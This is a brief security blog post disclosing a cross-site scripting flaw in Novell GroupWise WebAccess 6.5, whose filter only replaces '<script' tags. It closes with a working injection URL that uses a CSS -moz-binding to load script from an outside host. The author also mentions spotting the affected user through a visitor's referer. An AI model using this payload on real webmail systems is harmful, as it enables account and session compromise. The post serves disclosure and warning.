Novel Groupwise Webaccess XSS

Publicated on : 1185673673
Someone send his referer pointing out he uses Novel. I won't tell who, but I do found out that it's vulnerable to XSS. The vulnerable application was Novel Groupwise Webaccess Version 6.5. Novel does filter upon XSS but they make the obvious mistake of replacing instances of <script with <!-- and: <!. If you are quick you can see who it was in my referer list in the top right. I put this page up to show people that it is a bad idea to send your referer along, I hope it helps.

/servlet/webacc?User.Id="><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><"